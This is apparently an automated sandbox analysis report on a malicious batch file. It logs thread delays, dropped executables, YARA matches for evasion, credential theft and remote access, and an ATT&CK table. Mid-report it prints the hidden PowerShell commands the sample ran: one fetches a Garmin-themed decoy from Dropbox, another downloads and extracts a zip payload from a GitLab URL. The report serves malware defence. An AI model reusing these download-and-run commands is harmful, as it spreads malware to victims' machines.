                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5074Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4809Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4223Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2616Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3171Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6613Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2814Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2951Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep count: 5074 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep count: 4809 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1720Thread sleep count: 4223 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1720Thread sleep count: 2616 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6740Thread sleep count: 3171 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 980Thread sleep count: 6613 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep count: 2814 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3512Thread sleep count: 2951 > 30Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 0000000D.00000002.2895968350.000002514BDFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW2225%SystemRoot%\system32\mswsock.dllU
                Source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_6024.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi64_5064.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6024, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hngarm13de02.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hngarm13de02.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hngarm13de02.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hngarm13de02.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fIndJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/garmin_campaign_information_for_partners_v6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v6.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/fgsd1/gg/-/raw/main/fga1312.zip', 'c:\users\public\document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/garmin_campaign_information_for_partners_v6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v6.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/fgsd1/gg/-/raw/main/fga1312.zip', 'c:\users\public\document.zip')"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: amsi64_5064.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: amsi64_5064.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting
                Valid Accounts1
                Command and Scripting Interpreter
                11
                Scripting
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                21
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
